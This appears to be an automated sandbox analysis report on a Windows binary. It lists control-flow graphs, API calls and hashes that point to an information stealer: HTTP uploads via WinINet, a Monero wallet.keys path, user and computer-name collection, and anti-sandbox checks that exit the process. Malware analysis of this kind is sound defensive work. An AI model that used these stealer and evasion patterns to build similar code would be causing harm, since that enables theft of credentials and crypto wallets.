                                        control_flow_graph 801 1848d0-184992 call 19aab0 call 184800 call 19aa50 * 5 InternetOpenA StrCmpCA 816 18499b-18499f 801->816 817 184994 801->817 818 184f1b-184f43 InternetCloseHandle call 19ade0 call 18a210 816->818 819 1849a5-184b1d call 198cf0 call 19ac30 call 19abb0 call 19ab10 * 2 call 19acc0 call 19abb0 call 19ab10 call 19acc0 call 19abb0 call 19ab10 call 19ac30 call 19abb0 call 19ab10 call 19acc0 call 19abb0 call 19ab10 call 19acc0 call 19abb0 call 19ab10 call 19acc0 call 19ac30 call 19abb0 call 19ab10 * 2 InternetConnectA 816->819 817->816 829 184f82-184ff2 call 198b20 * 2 call 19aab0 call 19ab10 * 8 818->829 830 184f45-184f7d call 19ab30 call 19acc0 call 19abb0 call 19ab10 818->830 819->818 905 184b23-184b27 819->905 830->829 906 184b29-184b33 905->906 907 184b35 905->907 908 184b3f-184b72 HttpOpenRequestA 906->908 907->908 909 184b78-184e78 call 19acc0 call 19abb0 call 19ab10 call 19ac30 call 19abb0 call 19ab10 call 19acc0 call 19abb0 call 19ab10 call 19acc0 call 19abb0 call 19ab10 call 19acc0 call 19abb0 call 19ab10 call 19acc0 call 19abb0 call 19ab10 call 19ac30 call 19abb0 call 19ab10 call 19acc0 call 19abb0 call 19ab10 call 19acc0 call 19abb0 call 19ab10 call 19ac30 call 19abb0 call 19ab10 call 19acc0 call 19abb0 call 19ab10 call 19acc0 call 19abb0 call 19ab10 call 19acc0 call 19abb0 call 19ab10 call 19acc0 call 19abb0 call 19ab10 call 19ac30 call 19abb0 call 19ab10 call 19aa50 call 19ac30 * 2 call 19abb0 call 19ab10 * 2 call 19ade0 lstrlen call 19ade0 * 2 lstrlen call 19ade0 HttpSendRequestA 908->909 910 184f0e-184f15 InternetCloseHandle 908->910 1021 184e82-184eac InternetReadFile 909->1021 910->818 1022 184eae-184eb5 1021->1022 1023 184eb7-184f09 InternetCloseHandle call 19ab10 1021->1023 1022->1023 1024 184eb9-184ef7 call 19acc0 call 19abb0 call 19ab10 1022->1024 1023->910 1024->1021
                                        APIs
                                          • Part of subcall function 0019AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0019AAF6
                                          • Part of subcall function 00184800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00184889
                                          • Part of subcall function 00184800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00184899
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00184965
                                        • StrCmpCA.SHLWAPI(?,011CE938), ref: 0018498A
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00184B0A
                                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,001A0DDE,00000000,?,?,00000000,?,",00000000,?,011CE788), ref: 00184E38
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00184E54
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00184E68
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00184E99
                                        • InternetCloseHandle.WININET(00000000), ref: 00184EFD
                                        • InternetCloseHandle.WININET(00000000), ref: 00184F15
                                        • HttpOpenRequestA.WININET(00000000,011CE838,?,011CE398,00000000,00000000,00400100,00000000), ref: 00184B65
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                        • InternetCloseHandle.WININET(00000000), ref: 00184F1F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                        • String ID: "$"$------$------$------
                                        • API String ID: 460715078-2180234286
                                        • Opcode ID: 4e72f504d1e0ad971d75354629d9d9bc7bf810dee38c9743b748bfd8bc7fbbf7
                                        • Instruction ID: e38e788719dba7a9becaf41396e65d7dc11b37c64b309c387e4098ea6c64c1f7
                                        • Opcode Fuzzy Hash: 4e72f504d1e0ad971d75354629d9d9bc7bf810dee38c9743b748bfd8bc7fbbf7
                                        • Instruction Fuzzy Hash: 6712BA72911118ABCF15EB90DDA2FEEB379BF25300F9045A9B10766091DF706B48CFA5
                                        Function 00195760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1090 195760-1957c7 call 195d20 call 19ab30 * 3 call 19aa50 * 4 1106 1957cc-1957d3 1090->1106 1107 1957d5-195806 call 19ab30 call 19aab0 call 181590 call 195440 1106->1107 1108 195827-19589c call 19aa50 * 2 call 181590 call 195510 call 19abb0 call 19ab10 call 19ade0 StrCmpCA 1106->1108 1123 19580b-195822 call 19abb0 call 19ab10 1107->1123 1134 1958e3-1958f9 call 19ade0 StrCmpCA 1108->1134 1138 19589e-1958de call 19aab0 call 181590 call 195440 call 19abb0 call 19ab10 1108->1138 1123->1134 1139 195a2c-195a94 call 19abb0 call 19ab30 * 2 call 1816b0 call 19ab10 * 4 call 181670 call 181550 1134->1139 1140 1958ff-195906 1134->1140 1138->1134 1271 195d13-195d16 1139->1271 1142 195a2a-195aaf call 19ade0 StrCmpCA 1140->1142 1143 19590c-195913 1140->1143 1161 195be1-195c49 call 19abb0 call 19ab30 * 2 call 1816b0 call 19ab10 * 4 call 181670 call 181550 1142->1161 1162 195ab5-195abc 1142->1162 1146 19596e-1959e3 call 19aa50 * 2 call 181590 call 195510 call 19abb0 call 19ab10 call 19ade0 StrCmpCA 1143->1146 1147 195915-195969 call 19ab30 call 19aab0 call 181590 call 195440 call 19abb0 call 19ab10 1143->1147 1146->1142 1250 1959e5-195a25 call 19aab0 call 181590 call 195440 call 19abb0 call 19ab10 1146->1250 1147->1142 1161->1271 1168 195bdf-195c64 call 19ade0 StrCmpCA 1162->1168 1169 195ac2-195ac9 1162->1169 1198 195c78-195ce1 call 19abb0 call 19ab30 * 2 call 1816b0 call 19ab10 * 4 call 181670 call 181550 1168->1198 1199 195c66-195c71 Sleep 1168->1199 1175 195acb-195b1e call 19ab30 call 19aab0 call 181590 call 195440 call 19abb0 call 19ab10 1169->1175 1176 195b23-195b98 call 19aa50 * 2 call 181590 call 195510 call 19abb0 call 19ab10 call 19ade0 StrCmpCA 1169->1176 1175->1168 1176->1168 1274 195b9a-195bda call 19aab0 call 181590 call 195440 call 19abb0 call 19ab10 1176->1274 1198->1271 1199->1106 1250->1142 1274->1168
                                        APIs
                                          • Part of subcall function 0019AB30: lstrlen.KERNEL32(00184F55,?,?,00184F55,001A0DDF), ref: 0019AB3B
                                          • Part of subcall function 0019AB30: lstrcpy.KERNEL32(001A0DDF,00000000), ref: 0019AB95
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00195894
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001958F1
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00195AA7
                                          • Part of subcall function 0019AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0019AAF6
                                          • Part of subcall function 00195440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00195478
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                          • Part of subcall function 00195510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00195568
                                          • Part of subcall function 00195510: lstrlen.KERNEL32(00000000), ref: 0019557F
                                          • Part of subcall function 00195510: StrStrA.SHLWAPI(00000000,00000000), ref: 001955B4
                                          • Part of subcall function 00195510: lstrlen.KERNEL32(00000000), ref: 001955D3
                                          • Part of subcall function 00195510: lstrlen.KERNEL32(00000000), ref: 001955FE
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001959DB
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00195B90
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00195C5C
                                        • Sleep.KERNEL32(0000EA60), ref: 00195C6B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen$Sleep
                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 507064821-2791005934
                                        • Opcode ID: 56eeaf9dfe9fd96f92cc189405c03b37f58de78f76aa6e00b2e14e34b194c882
                                        • Instruction ID: bc01919af4e0005be7835c9da3137869857c739ef3327b7d0ceb86bf5d5d5187
                                        • Opcode Fuzzy Hash: 56eeaf9dfe9fd96f92cc189405c03b37f58de78f76aa6e00b2e14e34b194c882
                                        • Instruction Fuzzy Hash: 11E114729101049BCF14FBA0ED669ED737EAF65300F908568B50767092EF34AB0CCB96
                                        Function 001919F0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1301 1919f0-191a1d call 19ade0 StrCmpCA 1304 191a1f-191a21 ExitProcess 1301->1304 1305 191a27-191a41 call 19ade0 1301->1305 1309 191a44-191a48 1305->1309 1310 191a4e-191a61 1309->1310 1311 191c12-191c1d call 19ab10 1309->1311 1313 191bee-191c0d 1310->1313 1314 191a67-191a6a 1310->1314 1313->1309 1316 191a99-191aa8 call 19ab30 1314->1316 1317 191afd-191b0e StrCmpCA 1314->1317 1318 191b1f-191b30 StrCmpCA 1314->1318 1319 191bdf-191be9 call 19ab30 1314->1319 1320 191a71-191a80 call 19ab30 1314->1320 1321 191aad-191abe StrCmpCA 1314->1321 1322 191acf-191ae0 StrCmpCA 1314->1322 1323 191b41-191b52 StrCmpCA 1314->1323 1324 191ba1-191bb2 StrCmpCA 1314->1324 1325 191bc0-191bd1 StrCmpCA 1314->1325 1326 191b63-191b74 StrCmpCA 1314->1326 1327 191b82-191b93 StrCmpCA 1314->1327 1328 191a85-191a94 call 19ab30 1314->1328 1316->1313 1335 191b1a 1317->1335 1336 191b10-191b13 1317->1336 1337 191b3c 1318->1337 1338 191b32-191b35 1318->1338 1319->1313 1320->1313 1331 191aca 1321->1331 1332 191ac0-191ac3 1321->1332 1333 191aee-191af1 1322->1333 1334 191ae2-191aec 1322->1334 1339 191b5e 1323->1339 1340 191b54-191b57 1323->1340 1345 191bbe 1324->1345 1346 191bb4-191bb7 1324->1346 1348 191bdd 1325->1348 1349 191bd3-191bd6 1325->1349 1341 191b80 1326->1341 1342 191b76-191b79 1326->1342 1343 191b9f 1327->1343 1344 191b95-191b98 1327->1344 1328->1313 1331->1313 1332->1331 1353 191af8 1333->1353 1334->1353 1335->1313 1336->1335 1337->1313 1338->1337 1339->1313 1340->1339 1341->1313 1342->1341 1343->1313 1344->1343 1345->1313 1346->1345 1348->1313 1349->1348 1353->1313
                                        APIs
                                        • StrCmpCA.SHLWAPI(00000000,block), ref: 00191A15
                                        • ExitProcess.KERNEL32 ref: 00191A21
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID: block
                                        • API String ID: 621844428-2199623458
                                        • Opcode ID: 8d194ae1b599f66d00ce26abf123051aa2c17e261144a4a346c5e90a243f8405
                                        • Instruction ID: 6a7e4e03fa18f1ad688ba14f98fc56fd9f4a583140881133c01e745b86803553
                                        • Opcode Fuzzy Hash: 8d194ae1b599f66d00ce26abf123051aa2c17e261144a4a346c5e90a243f8405
                                        • Instruction Fuzzy Hash: 64512079B0420AEFDF14DFE4DA54AAE77BAEF44705F104098F402AB251E770E984CBA1
                                        Function 00196C90 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00199BB0: GetProcAddress.KERNEL32(74DD0000,011C2398), ref: 00199BF1
                                          • Part of subcall function 00199BB0: GetProcAddress.KERNEL32(74DD0000,011C2338), ref: 00199C0A
                                          • Part of subcall function 00199BB0: GetProcAddress.KERNEL32(74DD0000,011C2410), ref: 00199C22
                                          • Part of subcall function 00199BB0: GetProcAddress.KERNEL32(74DD0000,011C2500), ref: 00199C3A
                                          • Part of subcall function 00199BB0: GetProcAddress.KERNEL32(74DD0000,011C22F0), ref: 00199C53
                                          • Part of subcall function 00199BB0: GetProcAddress.KERNEL32(74DD0000,011C8FB8), ref: 00199C6B
                                          • Part of subcall function 00199BB0: GetProcAddress.KERNEL32(74DD0000,011B5810), ref: 00199C83
                                          • Part of subcall function 00199BB0: GetProcAddress.KERNEL32(74DD0000,011B5A70), ref: 00199C9C
                                          • Part of subcall function 00199BB0: GetProcAddress.KERNEL32(74DD0000,011C2428), ref: 00199CB4
                                          • Part of subcall function 00199BB0: GetProcAddress.KERNEL32(74DD0000,011C2440), ref: 00199CCC
                                          • Part of subcall function 00199BB0: GetProcAddress.KERNEL32(74DD0000,011C24D0), ref: 00199CE5
                                          • Part of subcall function 00199BB0: GetProcAddress.KERNEL32(74DD0000,011C23B0), ref: 00199CFD
                                          • Part of subcall function 00199BB0: GetProcAddress.KERNEL32(74DD0000,011B59B0), ref: 00199D15
                                          • Part of subcall function 00199BB0: GetProcAddress.KERNEL32(74DD0000,011C2470), ref: 00199D2E
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 001811D0: ExitProcess.KERNEL32 ref: 00181211
                                          • Part of subcall function 00181160: GetSystemInfo.KERNEL32(?), ref: 0018116A
                                          • Part of subcall function 00181160: ExitProcess.KERNEL32 ref: 0018117E
                                          • Part of subcall function 00181110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0018112B
                                          • Part of subcall function 00181110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00181132
                                          • Part of subcall function 00181110: ExitProcess.KERNEL32 ref: 00181143
                                          • Part of subcall function 00181220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0018123E
                                          • Part of subcall function 00181220: ExitProcess.KERNEL32 ref: 00181294
                                          • Part of subcall function 00196A10: GetUserDefaultLangID.KERNEL32 ref: 00196A14
                                          • Part of subcall function 00181190: ExitProcess.KERNEL32 ref: 001811C6
                                          • Part of subcall function 001979E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001811B7), ref: 00197A10
                                          • Part of subcall function 001979E0: RtlAllocateHeap.NTDLL(00000000), ref: 00197A17
                                          • Part of subcall function 001979E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00197A2F
                                          • Part of subcall function 00197A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00197AA0
                                          • Part of subcall function 00197A70: RtlAllocateHeap.NTDLL(00000000), ref: 00197AA7
                                          • Part of subcall function 00197A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00197ABF
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,011C8F08,?,001A10F4,?,00000000,?,001A10F8,?,00000000,001A0AF3), ref: 00196D6A
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00196D88
                                        • CloseHandle.KERNEL32(00000000), ref: 00196D99
                                        • Sleep.KERNEL32(00001770), ref: 00196DA4
                                        • CloseHandle.KERNEL32(?,00000000,?,011C8F08,?,001A10F4,?,00000000,?,001A10F8,?,00000000,001A0AF3), ref: 00196DBA
                                        • ExitProcess.KERNEL32 ref: 00196DC2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                        • String ID:
                                        • API String ID: 2931873225-0
                                        • Opcode ID: 614cdb5702da0361674be11ce374ae9627443737f54671e3178f55d49c35b62e
                                        • Instruction ID: 1dd115ed0102335c8a7fc46549fb65c81cf24b44a6d6f08a50f33eeed6f4d979
                                        • Opcode Fuzzy Hash: 614cdb5702da0361674be11ce374ae9627443737f54671e3178f55d49c35b62e
                                        • Instruction Fuzzy Hash: 9A31FA71E04208ABCF04FBF0DC56AEE7379AF24741F904968F11266192DF706A09CBA6
                                        Function 00196D93 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1436 196d93 1437 196daa 1436->1437 1439 196d5a-196d77 call 19ade0 OpenEventA 1437->1439 1440 196dac-196dc2 call 196bc0 call 195d60 CloseHandle ExitProcess 1437->1440 1445 196d79-196d91 call 19ade0 CreateEventA 1439->1445 1446 196d95-196da4 CloseHandle Sleep 1439->1446 1445->1440 1446->1437
                                        APIs
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,011C8F08,?,001A10F4,?,00000000,?,001A10F8,?,00000000,001A0AF3), ref: 00196D6A
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00196D88
                                        • CloseHandle.KERNEL32(00000000), ref: 00196D99
                                        • Sleep.KERNEL32(00001770), ref: 00196DA4
                                        • CloseHandle.KERNEL32(?,00000000,?,011C8F08,?,001A10F4,?,00000000,?,001A10F8,?,00000000,001A0AF3), ref: 00196DBA
                                        • ExitProcess.KERNEL32 ref: 00196DC2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                        • String ID:
                                        • API String ID: 941982115-0
                                        • Opcode ID: 122dca8c4eb92c72a3b507e748de9fd59c62cd26b67f45a9a0bc2d4334c70c92
                                        • Instruction ID: c7b8b80ec931a76dd98332e15adfb8d1fed99f6c1d65c993af22bb2a5762403c
                                        • Opcode Fuzzy Hash: 122dca8c4eb92c72a3b507e748de9fd59c62cd26b67f45a9a0bc2d4334c70c92
                                        • Instruction Fuzzy Hash: C5F08230A48309AFEF04BBE0EC0ABBD33B4AF14702F200535F522A51D5CBB0A500CAB5
                                        Function 00184800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00184889
                                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00184899
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
